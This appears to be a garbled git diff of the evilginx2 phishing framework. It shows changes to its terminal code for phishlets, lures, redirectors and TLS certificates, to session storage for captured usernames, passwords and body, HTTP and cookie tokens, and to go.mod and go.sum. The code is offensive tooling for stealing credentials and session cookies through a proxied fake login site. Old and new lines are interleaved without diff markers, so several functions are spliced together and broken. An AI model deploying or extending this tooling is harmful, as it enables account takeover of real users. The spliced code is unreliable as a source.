log.Warning("server ip not set! type: config ip <ip_address>")
|
||||
log.Warning("server ip not set! type: config ipv4 <ip_address>")
|
||||
}
|
||||
}
|
||||
|
||||
func (t *Terminal) updatePhishletCertificates(site string) {
|
||||
for _, s := range t.cfg.GetEnabledSites() {
|
||||
if site == "" || s == site {
|
||||
pl, err := t.cfg.GetPhishlet(s)
|
||||
if err != nil {
|
||||
log.Error("%v", err)
|
||||
continue
|
||||
}
|
||||
if t.developer {
|
||||
log.Info("developer mode is on - will use self-signed SSL/TLS certificates for phishlet '%s'", s)
|
||||
} else {
|
||||
log.Info("setting up certificates for phishlet '%s'...", s)
|
||||
err = t.crt_db.SetupPhishletCertificate(s, pl.GetPhishHosts())
|
||||
if err != nil {
|
||||
log.Fatal("%v", err)
|
||||
t.cfg.SetSiteDisabled(s)
|
||||
} else {
|
||||
log.Success("successfully set up SSL/TLS certificates for domains: %v", pl.GetPhishHosts())
|
||||
}
|
||||
}
|
||||
func (t *Terminal) manageCertificates(verbose bool) {
|
||||
if !t.p.developer {
|
||||
hosts := t.p.cfg.GetActiveHostnames("")
|
||||
//wc_host := t.p.cfg.GetWildcardHostname()
|
||||
//hosts := []string{wc_host}
|
||||
//hosts = append(hosts, t.p.cfg.GetActiveHostnames("")...)
|
||||
if verbose {
|
||||
log.Info("obtaining and setting up %d TLS certificates - please wait up to 60 seconds...", len(hosts))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func (t *Terminal) updateLuresCertificates() {
|
||||
for n, l := range t.cfg.lures {
|
||||
if l.Hostname != "" {
|
||||
err := t.updateHostCertificate(l.Hostname)
|
||||
if err != nil {
|
||||
log.Info("clearing hostname for lure %d", n)
|
||||
l.Hostname = ""
|
||||
err := t.cfg.SetLure(n, l)
|
||||
if err != nil {
|
||||
log.Error("edit: %v", err)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func (t *Terminal) updateHostCertificate(hostname string) error {
|
||||
|
||||
if t.developer {
|
||||
log.Info("developer mode is on - will use self-signed SSL/TLS certificates for hostname '%s'", hostname)
|
||||
} else {
|
||||
log.Info("setting up certificates for hostname '%s'...", hostname)
|
||||
err := t.crt_db.SetupHostnameCertificate(hostname)
|
||||
err := t.p.crt_db.setManagedSync(hosts, 60*time.Second)
|
||||
if err != nil {
|
||||
return err
|
||||
} else {
|
||||
log.Success("successfully set up SSL/TLS certificates for hostname: %s", hostname)
|
||||
log.Error("failed to set up TLS certificates: %s", err)
|
||||
log.Error("run 'test-certs' command to retry")
|
||||
return
|
||||
}
|
||||
if verbose {
|
||||
log.Info("successfully set up all TLS certificates")
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (t *Terminal) sprintPhishletStatus(site string) string {
|
||||
higreen := color.New(color.FgHiGreen)
|
||||
hired := color.New(color.FgHiRed)
|
||||
hiblue := color.New(color.FgHiBlue)
|
||||
blue := color.New(color.FgBlue)
|
||||
cyan := color.New(color.FgHiCyan)
|
||||
yellow := color.New(color.FgYellow)
|
||||
hiwhite := color.New(color.FgHiWhite)
|
||||
higray := color.New(color.FgWhite)
|
||||
logray := color.New(color.FgHiBlack)
|
||||
n := 0
|
||||
cols := []string{"phishlet", "author", "active", "status", "hostname"}
|
||||
cols := []string{"phishlet", "status", "visibility", "hostname"}
|
||||
var rows [][]string
|
||||
for s, _ := range t.cfg.phishlets {
|
||||
|
||||
var pnames []string
|
||||
for s := range t.cfg.phishlets {
|
||||
pnames = append(pnames, s)
|
||||
}
|
||||
sort.Strings(pnames)
|
||||
|
||||
for _, s := range pnames {
|
||||
pl := t.cfg.phishlets[s]
|
||||
if site == "" || s == site {
|
||||
pl, err := t.cfg.GetPhishlet(s)
|
||||
_, err := t.cfg.GetPhishlet(s)
|
||||
if err != nil {
|
||||
continue
|
||||
}
|
||||
|
||||
status := hired.Sprint("disabled")
|
||||
if t.cfg.IsSiteEnabled(s) {
|
||||
status := logray.Sprint("disabled")
|
||||
if pl.isTemplate {
|
||||
status = yellow.Sprint("template")
|
||||
} else if t.cfg.IsSiteEnabled(s) {
|
||||
status = higreen.Sprint("enabled")
|
||||
}
|
||||
hidden_status := higreen.Sprint("available")
|
||||
hidden_status := higray.Sprint("visible")
|
||||
if t.cfg.IsSiteHidden(s) {
|
||||
hidden_status = hired.Sprint("hidden")
|
||||
hidden_status = logray.Sprint("hidden")
|
||||
}
|
||||
domain, _ := t.cfg.GetSiteDomain(s)
|
||||
n += 1
|
||||
|
||||
rows = append(rows, []string{hiblue.Sprint(s), hiwhite.Sprint(pl.Author), status, hidden_status, yellow.Sprint(domain)})
|
||||
if s == site {
|
||||
var param_names string
|
||||
for k, v := range pl.customParams {
|
||||
if len(param_names) > 0 {
|
||||
param_names += "; "
|
||||
}
|
||||
param_names += k
|
||||
if v != "" {
|
||||
param_names += ": " + v
|
||||
}
|
||||
}
|
||||
|
||||
keys := []string{"phishlet", "parent", "status", "visibility", "hostname", "params"}
|
||||
vals := []string{hiblue.Sprint(s), blue.Sprint(pl.ParentName), status, hidden_status, cyan.Sprint(domain), logray.Sprint(param_names)}
|
||||
return AsRows(keys, vals)
|
||||
} else if site == "" {
|
||||
rows = append(rows, []string{hiblue.Sprint(s), status, hidden_status, cyan.Sprint(domain)})
|
||||
}
|
||||
}
|
||||
}
|
||||
return AsTable(cols, rows)
|
||||
}
|
||||
|
||||
func (t *Terminal) sprintIsEnabled(enabled bool) string {
|
||||
logray := color.New(color.FgHiBlack)
|
||||
normal := color.New(color.Reset)
|
||||
|
||||
if enabled {
|
||||
return normal.Sprint("true")
|
||||
} else {
|
||||
return logray.Sprint("false")
|
||||
}
|
||||
}
|
||||
|
||||
func (t *Terminal) sprintLures() string {
|
||||
higreen := color.New(color.FgHiGreen)
|
||||
green := color.New(color.FgGreen)
|
||||
@ -1191,7 +1253,7 @@ func (t *Terminal) sprintLures() string {
|
||||
hcyan := color.New(color.FgHiCyan)
|
||||
white := color.New(color.FgHiWhite)
|
||||
//n := 0
|
||||
cols := []string{"id", "phishlet", "hostname", "path", "template", "ua_filter", "redirect_url", "og"}
|
||||
cols := []string{"id", "phishlet", "hostname", "path", "redirector", "ua_filter", "redirect_url", "og"}
|
||||
var rows [][]string
|
||||
for n, l := range t.cfg.lures {
|
||||
var og string
|
||||
@ -1215,7 +1277,7 @@ func (t *Terminal) sprintLures() string {
|
||||
} else {
|
||||
og += "-"
|
||||
}
|
||||
rows = append(rows, []string{strconv.Itoa(n), hiblue.Sprint(l.Phishlet), cyan.Sprint(l.Hostname), hcyan.Sprint(l.Path), white.Sprint(l.Template), green.Sprint(l.UserAgentFilter), yellow.Sprint(l.RedirectUrl), og})
|
||||
rows = append(rows, []string{strconv.Itoa(n), hiblue.Sprint(l.Phishlet), cyan.Sprint(l.Hostname), hcyan.Sprint(l.Path), white.Sprint(l.Redirector), green.Sprint(l.UserAgentFilter), yellow.Sprint(l.RedirectUrl), og})
|
||||
}
|
||||
return AsTable(cols, rows)
|
||||
}
|
||||
@ -1224,8 +1286,8 @@ func (t *Terminal) phishletPrefixCompleter(args string) []string {
|
||||
return t.cfg.GetPhishletNames()
|
||||
}
|
||||
|
||||
func (t *Terminal) templatesPrefixCompleter(args string) []string {
|
||||
dir := t.cfg.GetTemplatesDir()
|
||||
func (t *Terminal) redirectorsPrefixCompleter(args string) []string {
|
||||
dir := t.cfg.GetRedirectorsDir()
|
||||
|
||||
files, err := ioutil.ReadDir(dir)
|
||||
if err != nil {
|
||||
@ -1233,12 +1295,22 @@ func (t *Terminal) templatesPrefixCompleter(args string) []string {
|
||||
}
|
||||
var ret []string
|
||||
for _, f := range files {
|
||||
if strings.HasSuffix(f.Name(), ".html") || strings.HasSuffix(f.Name(), ".htm") {
|
||||
name := f.Name()
|
||||
if strings.Contains(name, " ") {
|
||||
name = "\"" + name + "\""
|
||||
if f.IsDir() {
|
||||
index_path1 := filepath.Join(dir, f.Name(), "index.html")
|
||||
index_path2 := filepath.Join(dir, f.Name(), "index.htm")
|
||||
index_found := ""
|
||||
if _, err := os.Stat(index_path1); !os.IsNotExist(err) {
|
||||
index_found = index_path1
|
||||
} else if _, err := os.Stat(index_path2); !os.IsNotExist(err) {
|
||||
index_found = index_path2
|
||||
}
|
||||
if index_found != "" {
|
||||
name := f.Name()
|
||||
if strings.Contains(name, " ") {
|
||||
name = "\"" + name + "\""
|
||||
}
|
||||
ret = append(ret, name)
|
||||
}
|
||||
ret = append(ret, name)
|
||||
}
|
||||
}
|
||||
return ret
|
||||
@ -1246,7 +1318,7 @@ func (t *Terminal) templatesPrefixCompleter(args string) []string {
|
||||
|
||||
func (t *Terminal) luresIdPrefixCompleter(args string) []string {
|
||||
var ret []string
|
||||
for n, _ := range t.cfg.lures {
|
||||
for n := range t.cfg.lures {
|
||||
ret = append(ret, strconv.Itoa(n))
|
||||
}
|
||||
return ret
|
||||
@ -1446,7 +1518,7 @@ func (t *Terminal) exportPhishUrls(export_path string, phish_urls []string, phis
|
||||
var param_names []string
|
||||
cols = append(cols, "url")
|
||||
for _, params_row := range phish_params {
|
||||
for k, _ := range params_row {
|
||||
for k := range params_row {
|
||||
if !stringExists(k, param_names) {
|
||||
cols = append(cols, k)
|
||||
param_names = append(param_names, k)
|
||||
@ -1508,7 +1580,7 @@ func (t *Terminal) exportPhishUrls(export_path string, phish_urls []string, phis
|
||||
func (t *Terminal) createPhishUrl(base_url string, params *url.Values) string {
|
||||
var ret string = base_url
|
||||
if len(*params) > 0 {
|
||||
key_arg := GenRandomString(rand.Intn(3) + 1)
|
||||
key_arg := strings.ToLower(GenRandomString(rand.Intn(3) + 1))
|
||||
|
||||
enc_key := GenRandomAlphanumString(8)
|
||||
dec_params := params.Encode()
|
||||
|
@ -4,6 +4,8 @@ import (
"crypto/rand"
"crypto/sha256"
"fmt"
"io/fs"
"io/ioutil"
"os"
)

@ -46,3 +48,30 @@ func CreateDir(path string, perm os.FileMode) error {
}
return nil
}

func ReadFromFile(path string) ([]byte, error) {
f, err := os.OpenFile(path, os.O_RDONLY, 0644)
defer f.Close()
if err != nil {
return nil, err
}
b, err := ioutil.ReadAll(f)
if err != nil {
return nil, err
}
return b, nil
}

func SaveToFile(b []byte, fpath string, perm fs.FileMode) error {
file, err := os.OpenFile(fpath, os.O_WRONLY|os.O_TRUNC|os.O_CREATE, perm)
if err != nil {
return err
}
defer file.Close()

_, err = file.Write(b)
if err != nil {
return err
}
return nil
}
@ -54,8 +54,18 @@ func (d *Database) SetSessionCustom(sid string, name string, value string) error
return err
}

func (d *Database) SetSessionTokens(sid string, tokens map[string]map[string]*Token) error {
err := d.sessionsUpdateTokens(sid, tokens)
func (d *Database) SetSessionBodyTokens(sid string, tokens map[string]string) error {
err := d.sessionsUpdateBodyTokens(sid, tokens)
return err
}

func (d *Database) SetSessionHttpTokens(sid string, tokens map[string]string) error {
err := d.sessionsUpdateHttpTokens(sid, tokens)
return err
}

func (d *Database) SetSessionCookieTokens(sid string, tokens map[string]map[string]*CookieToken) error {
err := d.sessionsUpdateCookieTokens(sid, tokens)
return err
}

@ -11,21 +11,23 @@ import (
const SessionTable = "sessions"

type Session struct {
Id int `json:"id"`
Phishlet string `json:"phishlet"`
LandingURL string `json:"landing_url"`
Username string `json:"username"`
Password string `json:"password"`
Custom map[string]string `json:"custom"`
Tokens map[string]map[string]*Token `json:"tokens"`
SessionId string `json:"session_id"`
UserAgent string `json:"useragent"`
RemoteAddr string `json:"remote_addr"`
CreateTime int64 `json:"create_time"`
UpdateTime int64 `json:"update_time"`
Id int `json:"id"`
Phishlet string `json:"phishlet"`
LandingURL string `json:"landing_url"`
Username string `json:"username"`
Password string `json:"password"`
Custom map[string]string `json:"custom"`
BodyTokens map[string]string `json:"body_tokens"`
HttpTokens map[string]string `json:"http_tokens"`
CookieTokens map[string]map[string]*CookieToken `json:"tokens"`
SessionId string `json:"session_id"`
UserAgent string `json:"useragent"`
RemoteAddr string `json:"remote_addr"`
CreateTime int64 `json:"create_time"`
UpdateTime int64 `json:"update_time"`
}

type Token struct {
type CookieToken struct {
Name string
Value string
Path string
@ -46,18 +48,20 @@ func (d *Database) sessionsCreate(sid string, phishlet string, landing_url strin
id, _ := d.getNextId(SessionTable)

s := &Session{
Id: id,
Phishlet: phishlet,
LandingURL: landing_url,
Username: "",
Password: "",
Custom: make(map[string]string),
Tokens: make(map[string]map[string]*Token),
SessionId: sid,
UserAgent: useragent,
RemoteAddr: remote_addr,
CreateTime: time.Now().UTC().Unix(),
UpdateTime: time.Now().UTC().Unix(),
Id: id,
Phishlet: phishlet,
LandingURL: landing_url,
Username: "",
Password: "",
Custom: make(map[string]string),
BodyTokens: make(map[string]string),
HttpTokens: make(map[string]string),
CookieTokens: make(map[string]map[string]*CookieToken),
SessionId: sid,
UserAgent: useragent,
RemoteAddr: remote_addr,
CreateTime: time.Now().UTC().Unix(),
UpdateTime: time.Now().UTC().Unix(),
}

jf, _ := json.Marshal(s)
@ -126,12 +130,36 @@ func (d *Database) sessionsUpdateCustom(sid string, name string, value string) e
return err
}

func (d *Database) sessionsUpdateTokens(sid string, tokens map[string]map[string]*Token) error {
func (d *Database) sessionsUpdateBodyTokens(sid string, tokens map[string]string) error {
s, err := d.sessionsGetBySid(sid)
if err != nil {
return err
}
s.Tokens = tokens
s.BodyTokens = tokens
s.UpdateTime = time.Now().UTC().Unix()

err = d.sessionsUpdate(s.Id, s)
return err
}

func (d *Database) sessionsUpdateHttpTokens(sid string, tokens map[string]string) error {
s, err := d.sessionsGetBySid(sid)
if err != nil {
return err
}
s.HttpTokens = tokens
s.UpdateTime = time.Now().UTC().Unix()

err = d.sessionsUpdate(s.Id, s)
return err
}

func (d *Database) sessionsUpdateCookieTokens(sid string, tokens map[string]map[string]*CookieToken) error {
s, err := d.sessionsGetBySid(sid)
if err != nil {
return err
}
s.CookieTokens = tokens
s.UpdateTime = time.Now().UTC().Unix()

err = d.sessionsUpdate(s.Id, s)

54
go.mod
@@ -1,25 +1,57 @@
module github.com/kgretzky/evilginx2

go 1.12
go 1.18

require (
github.com/chzyer/logex v1.1.10 // indirect
github.com/caddyserver/certmagic v0.16.1
github.com/chzyer/readline v0.0.0-20180603132655-2972be24d48e
github.com/chzyer/test v0.0.0-20180213035817-a1ea475d72b1 // indirect
github.com/elazarl/goproxy v0.0.0-20190911111923-ecfe977594f1
github.com/fatih/color v1.7.0
github.com/elazarl/goproxy v0.0.0-20220529153421-8ea89ba92021
github.com/fatih/color v1.13.0
github.com/go-acme/lego/v3 v3.1.0
github.com/gorilla/mux v1.7.3
github.com/inconshreveable/go-vhost v0.0.0-20160627193104-06d84117953b
github.com/mattn/go-colorable v0.1.4 // indirect
github.com/miekg/dns v1.1.22
github.com/miekg/dns v1.1.50
github.com/mwitkow/go-http-dialer v0.0.0-20161116154839-378f744fb2b8
github.com/spf13/viper v1.4.0
github.com/tidwall/btree v0.0.0-20170113224114-9876f1454cf0 // indirect
github.com/spf13/viper v1.10.1
github.com/tidwall/buntdb v1.1.0
github.com/tidwall/gjson v1.3.2 // indirect
golang.org/x/net v0.0.0-20220728211354-c7608f3a8462
)

require (
github.com/cenkalti/backoff/v3 v3.0.0 // indirect
github.com/fsnotify/fsnotify v1.5.1 // indirect
github.com/hashicorp/hcl v1.0.0 // indirect
github.com/klauspost/cpuid/v2 v2.1.0 // indirect
github.com/libdns/libdns v0.2.1 // indirect
github.com/magiconair/properties v1.8.6 // indirect
github.com/mattn/go-colorable v0.1.12 // indirect
github.com/mattn/go-isatty v0.0.14 // indirect
github.com/mholt/acmez v1.0.3 // indirect
github.com/mitchellh/mapstructure v1.4.3 // indirect
github.com/pelletier/go-toml v1.9.4 // indirect
github.com/spf13/afero v1.8.1 // indirect
github.com/spf13/cast v1.4.1 // indirect
github.com/spf13/jwalterweatherman v1.1.0 // indirect
github.com/spf13/pflag v1.0.5 // indirect
github.com/subosito/gotenv v1.2.0 // indirect
github.com/tidwall/btree v0.0.0-20170113224114-9876f1454cf0 // indirect
github.com/tidwall/gjson v1.14.0 // indirect
github.com/tidwall/grect v0.0.0-20161006141115-ba9a043346eb // indirect
github.com/tidwall/match v1.1.1 // indirect
github.com/tidwall/pretty v1.2.0 // indirect
github.com/tidwall/rtree v0.0.0-20180113144539-6cd427091e0e // indirect
github.com/tidwall/tinyqueue v0.0.0-20180302190814-1e39f5511563 // indirect
golang.org/x/net v0.0.0-20200707034311-ab3426394381
go.uber.org/atomic v1.9.0 // indirect
go.uber.org/multierr v1.8.0 // indirect
go.uber.org/zap v1.21.0 // indirect
golang.org/x/crypto v0.0.0-20220722155217-630584e8d5aa // indirect
golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4 // indirect
golang.org/x/sys v0.0.0-20220731174439-a90be440212d // indirect
golang.org/x/text v0.3.7 // indirect
golang.org/x/tools v0.1.12 // indirect
gopkg.in/ini.v1 v1.66.4 // indirect
gopkg.in/square/go-jose.v2 v2.3.1 // indirect
gopkg.in/yaml.v2 v2.4.0 // indirect
)

replace github.com/elazarl/goproxy => github.com/kgretzky/goproxy v0.0.0-20220622134552-7d0e0c658440
525
go.sum
@@ -1,7 +1,42 @@
|
||||
cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw=
|
||||
cloud.google.com/go v0.34.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw=
|
||||
cloud.google.com/go v0.38.0/go.mod h1:990N+gfupTy94rShfmMCWGDn0LpTmnzTp2qbd1dvSRU=
|
||||
cloud.google.com/go v0.44.1/go.mod h1:iSa0KzasP4Uvy3f1mN/7PiObzGgflwredwwASm/v6AU=
|
||||
cloud.google.com/go v0.44.2/go.mod h1:60680Gw3Yr4ikxnPRS/oxxkBccT6SA1yMk63TGekxKY=
|
||||
cloud.google.com/go v0.44.3/go.mod h1:60680Gw3Yr4ikxnPRS/oxxkBccT6SA1yMk63TGekxKY=
|
||||
cloud.google.com/go v0.45.1/go.mod h1:RpBamKRgapWJb87xiFSdk4g1CME7QZg3uwTez+TSTjc=
|
||||
cloud.google.com/go v0.46.3/go.mod h1:a6bKKbmY7er1mI7TEI4lsAkts/mkhTSZK8w33B4RAg0=
|
||||
cloud.google.com/go v0.50.0/go.mod h1:r9sluTvynVuxRIOHXQEHMFffphuXHOMZMycpNR5e6To=
|
||||
cloud.google.com/go v0.52.0/go.mod h1:pXajvRH/6o3+F9jDHZWQ5PbGhn+o8w9qiu/CffaVdO4=
|
||||
cloud.google.com/go v0.53.0/go.mod h1:fp/UouUEsRkN6ryDKNW/Upv/JBKnv6WDthjR6+vze6M=
|
||||
cloud.google.com/go v0.54.0/go.mod h1:1rq2OEkV3YMf6n/9ZvGWI3GWw0VoqH/1x2nd8Is/bPc=
|
||||
cloud.google.com/go v0.56.0/go.mod h1:jr7tqZxxKOVYizybht9+26Z/gUq7tiRzu+ACVAMbKVk=
|
||||
cloud.google.com/go v0.57.0/go.mod h1:oXiQ6Rzq3RAkkY7N6t3TcE6jE+CIBBbA36lwQ1JyzZs=
|
||||
cloud.google.com/go v0.62.0/go.mod h1:jmCYTdRCQuc1PHIIJ/maLInMho30T/Y0M4hTdTShOYc=
|
||||
cloud.google.com/go v0.65.0/go.mod h1:O5N8zS7uWy9vkA9vayVHs65eM1ubvY4h553ofrNHObY=
|
||||
cloud.google.com/go v0.72.0/go.mod h1:M+5Vjvlc2wnp6tjzE102Dw08nGShTscUx2nZMufOKPI=
|
||||
cloud.google.com/go v0.74.0/go.mod h1:VV1xSbzvo+9QJOxLDaJfTjx5e+MePCpCWwvftOeQmWk=
|
||||
cloud.google.com/go v0.75.0/go.mod h1:VGuuCn7PG0dwsd5XPVm2Mm3wlh3EL55/79EKB6hlPTY=
|
||||
cloud.google.com/go/bigquery v1.0.1/go.mod h1:i/xbL2UlR5RvWAURpBYZTtm/cXjCha9lbfbpx4poX+o=
|
||||
cloud.google.com/go/bigquery v1.3.0/go.mod h1:PjpwJnslEMmckchkHFfq+HTD2DmtT67aNFKH1/VBDHE=
|
||||
cloud.google.com/go/bigquery v1.4.0/go.mod h1:S8dzgnTigyfTmLBfrtrhyYhwRxG72rYxvftPBK2Dvzc=
|
||||
cloud.google.com/go/bigquery v1.5.0/go.mod h1:snEHRnqQbz117VIFhE8bmtwIDY80NLUZUMb4Nv6dBIg=
|
||||
cloud.google.com/go/bigquery v1.7.0/go.mod h1://okPTzCYNXSlb24MZs83e2Do+h+VXtc4gLoIoXIAPc=
|
||||
cloud.google.com/go/bigquery v1.8.0/go.mod h1:J5hqkt3O0uAFnINi6JXValWIb1v0goeZM77hZzJN/fQ=
|
||||
cloud.google.com/go/datastore v1.0.0/go.mod h1:LXYbyblFSglQ5pkeyhO+Qmw7ukd3C+pD7TKLgZqpHYE=
|
||||
cloud.google.com/go/datastore v1.1.0/go.mod h1:umbIZjpQpHh4hmRpGhH4tLFup+FVzqBi1b3c64qFpCk=
|
||||
cloud.google.com/go/pubsub v1.0.1/go.mod h1:R0Gpsv3s54REJCy4fxDixWD93lHJMoZTyQ2kNxGRt3I=
|
||||
cloud.google.com/go/pubsub v1.1.0/go.mod h1:EwwdRX2sKPjnvnqCa270oGRyludottCI76h+R3AArQw=
|
||||
cloud.google.com/go/pubsub v1.2.0/go.mod h1:jhfEVHT8odbXTkndysNHCcx0awwzvfOlguIAii9o8iA=
|
||||
cloud.google.com/go/pubsub v1.3.1/go.mod h1:i+ucay31+CNRpDW4Lu78I4xXG+O1r/MAHgjpRVR+TSU=
|
||||
cloud.google.com/go/storage v1.0.0/go.mod h1:IhtSnM/ZTZV8YYJWCY8RULGVqBDmpoyjwiyrjsg+URw=
|
||||
cloud.google.com/go/storage v1.5.0/go.mod h1:tpKbwo567HUNpVclU5sGELwQWBDZ8gh0ZeosJ0Rtdos=
|
||||
cloud.google.com/go/storage v1.6.0/go.mod h1:N7U0C8pVQ/+NIKOBQyamJIeKQKkZ+mxpohlUTyfDhBk=
|
||||
cloud.google.com/go/storage v1.8.0/go.mod h1:Wv1Oy7z6Yz3DshWRJFhqM/UCfaWIRTdp0RXyy7KQOVs=
|
||||
cloud.google.com/go/storage v1.10.0/go.mod h1:FLPqc6j+Ki4BU591ie1oL6qBQGu2Bl/tZ9ullr3+Kg0=
|
||||
cloud.google.com/go/storage v1.14.0/go.mod h1:GrKmX003DSIwi9o29oFT7YDnHYwZoctc3fOKtUw0Xmo=
|
||||
contrib.go.opencensus.io/exporter/ocagent v0.4.12/go.mod h1:450APlNTSR6FrvC3CTRqYosuDstRB9un7SOx2k/9ckA=
|
||||
dmitri.shuralyov.com/gpu/mtl v0.0.0-20190408044501-666a987793e9/go.mod h1:H6x//7gZCb22OMCxBHrMx7a5I7Hp++hsVxbQ4BYO7hU=
|
||||
github.com/Azure/azure-sdk-for-go v32.4.0+incompatible/go.mod h1:9XXNKU+eRnpl9moKnB4QOLf1HestfXbmab5FXxiDBjc=
|
||||
github.com/Azure/go-autorest/autorest v0.1.0/go.mod h1:AKyIcETwSUFxIcs/Wnq/C+kwCtlEYGUVd7FPNb2slmg=
|
||||
github.com/Azure/go-autorest/autorest v0.5.0/go.mod h1:9HLKlQjVBH6U3oDfsXOeVc56THsLPw1L03yban4xThw=
|
||||
@@ -15,9 +50,8 @@ github.com/Azure/go-autorest/autorest/to v0.2.0/go.mod h1:GunWKJp1AEqgMaGLV+iocm
|
||||
github.com/Azure/go-autorest/autorest/validation v0.1.0/go.mod h1:Ha3z/SqBeaalWQvokg3NZAlQTalVMtOIAs1aGK7G6u8=
|
||||
github.com/Azure/go-autorest/logger v0.1.0/go.mod h1:oExouG+K6PryycPJfVSxi/koC6LSNgds39diKLz7Vrc=
|
||||
github.com/Azure/go-autorest/tracing v0.1.0/go.mod h1:ROEEAFwXycQw7Sn3DXNtEedEvdeRAgDr0izn4z5Ij88=
|
||||
github.com/BurntSushi/toml v0.3.1 h1:WXkYYl6Yr3qBf1K79EBnL4mak0OimBfB0XUf9Vl28OQ=
|
||||
github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU=
|
||||
github.com/OneOfOne/xxhash v1.2.2/go.mod h1:HSdplMjZKSmBqAxg5vPj2TmRDmfkzw+cTzAElWljhcU=
|
||||
github.com/BurntSushi/xgb v0.0.0-20160522181843-27f122750802/go.mod h1:IVnqGOEym/WlBOVXweHU+Q+/VP0lqqI8lqeDx9IjBqo=
|
||||
github.com/OpenDNS/vegadns2client v0.0.0-20180418235048-a3fa4a771d87/go.mod h1:iGLljf5n9GjT6kc0HBvyI1nOKnGQbNB66VzSNbK5iks=
|
||||
github.com/Shopify/sarama v1.19.0/go.mod h1:FVkBWblsNy7DGZRfXLU0O9RCGt5g3g3yEuWXgklEdEo=
|
||||
github.com/Shopify/toxiproxy v2.1.4+incompatible/go.mod h1:OXgGpZ6Cli1/URJOF1DMxUHB2q5Ap20/P/eIdh4G0pI=
|
||||
@@ -27,16 +61,19 @@ github.com/alecthomas/units v0.0.0-20151022065526-2efee857e7cf/go.mod h1:ybxpYRF
|
||||
github.com/aliyun/alibaba-cloud-sdk-go v0.0.0-20190808125512-07798873deee/go.mod h1:myCDvQSzCW+wB1WAlocEru4wMGJxy+vlxHdhegi1CDQ=
|
||||
github.com/aliyun/aliyun-oss-go-sdk v0.0.0-20190307165228-86c17b95fcd5/go.mod h1:T/Aws4fEfogEE9v+HPhhw+CntffsBHJ8nXQCwKr0/g8=
|
||||
github.com/apache/thrift v0.12.0/go.mod h1:cp2SuWMxlEZw2r+iP2GNCdIi4C1qmUzdZFSVb+bacwQ=
|
||||
github.com/armon/consul-api v0.0.0-20180202201655-eb2c6b5be1b6/go.mod h1:grANhF5doyWs3UAsr3K4I6qtAmlQcZDesFNEHPZAzj8=
|
||||
github.com/aws/aws-sdk-go v1.23.0/go.mod h1:KmX6BPdI08NWTb3/sm4ZGu5ShLoqVDhKgpiN924inxo=
|
||||
github.com/baiyubin/aliyun-sts-go-sdk v0.0.0-20180326062324-cfa1a18b161f/go.mod h1:AuiFmCCPBSrqvVMvuqFuk0qogytodnVFVSN5CeJB8Gc=
|
||||
github.com/benbjohnson/clock v1.1.0 h1:Q92kusRqC1XV2MjkWETPvjJVqKetz1OzxZB7mHJLju8=
|
||||
github.com/benbjohnson/clock v1.1.0/go.mod h1:J11/hYXuz8f4ySSvYwY0FKfm+ezbsZBKZxNJlLklBHA=
|
||||
github.com/beorn7/perks v0.0.0-20180321164747-3a771d992973/go.mod h1:Dwedo/Wpr24TaqPxmxbtue+5NUziq4I4S80YR8gNf3Q=
|
||||
github.com/beorn7/perks v1.0.0/go.mod h1:KWe93zE9D1o94FZ5RNwFwVgaQK1VOXiVxmqh+CedLV8=
|
||||
github.com/beorn7/perks v1.0.1/go.mod h1:G2ZrVWU2WbWT9wwq4/hrbKbnv/1ERSJQ0ibhJ6rlkpw=
|
||||
github.com/caddyserver/certmagic v0.16.1 h1:rdSnjcUVJojmL4M0efJ+yHXErrrijS4YYg3FuwRdJkI=
|
||||
github.com/caddyserver/certmagic v0.16.1/go.mod h1:jKQ5n+ViHAr6DbPwEGLTSM2vDwTO6EvCKBblBRUvvuQ=
|
||||
github.com/cenkalti/backoff/v3 v3.0.0 h1:ske+9nBpD9qZsTBoF41nW5L+AIuFBKMeze18XQ3eG1c=
|
||||
github.com/cenkalti/backoff/v3 v3.0.0/go.mod h1:cIeZDE3IrqwwJl6VUwCN6trj1oXrTS4rc0ij+ULvLYs=
|
||||
github.com/census-instrumentation/opencensus-proto v0.2.0/go.mod h1:f6KPmirojxKA12rnyqOA5BBL4O983OfeGPqjHWSTneU=
|
||||
github.com/cespare/xxhash v1.1.0/go.mod h1:XrSqR1VqqWfGrhpAt58auRo0WTKS1nRRg3ghfAqPWnc=
|
||||
github.com/census-instrumentation/opencensus-proto v0.2.1/go.mod h1:f6KPmirojxKA12rnyqOA5BBL4O983OfeGPqjHWSTneU=
|
||||
github.com/chzyer/logex v1.1.10 h1:Swpa1K6QvQznwJRcfTfQJmTE72DqScAa40E+fbHEXEE=
|
||||
github.com/chzyer/logex v1.1.10/go.mod h1:+Ywpsq7O8HXn0nuIou7OrIPyXbp3wmkHB+jjWRnGsAI=
|
||||
github.com/chzyer/readline v0.0.0-20180603132655-2972be24d48e h1:fY5BOSpyZCqRo5OhCuC+XN+r/bBCmeuuJtjz+bCNIf8=
|
||||
@@ -45,11 +82,9 @@ github.com/chzyer/test v0.0.0-20180213035817-a1ea475d72b1 h1:q763qf9huN11kDQavWs
|
||||
github.com/chzyer/test v0.0.0-20180213035817-a1ea475d72b1/go.mod h1:Q3SI9o4m/ZMnBNeIyt5eFwwo7qiLfzFZmjNmxjkiQlU=
|
||||
github.com/client9/misspell v0.3.4/go.mod h1:qj6jICC3Q7zFZvVWo7KLAzC3yx5G7kyvSDkc90ppPyw=
|
||||
github.com/cloudflare/cloudflare-go v0.10.2/go.mod h1:qhVI5MKwBGhdNU89ZRz2plgYutcJ5PCekLxXn56w6SY=
|
||||
github.com/coreos/bbolt v1.3.2/go.mod h1:iRUV2dpdMOn7Bo10OQBFzIJO9kkE559Wcmn+qkEiiKk=
|
||||
github.com/coreos/etcd v3.3.10+incompatible/go.mod h1:uF7uidLiAD3TWHmW31ZFd/JWoc32PjwdhPthX9715RE=
|
||||
github.com/coreos/go-semver v0.2.0/go.mod h1:nnelYz7RCh+5ahJtPPxZlU+153eP4D4r3EedlOD2RNk=
|
||||
github.com/coreos/go-systemd v0.0.0-20190321100706-95778dfbb74e/go.mod h1:F5haX7vjVVG0kc13fIWeqUViNPyEJxv/OmvnBo0Yme4=
|
||||
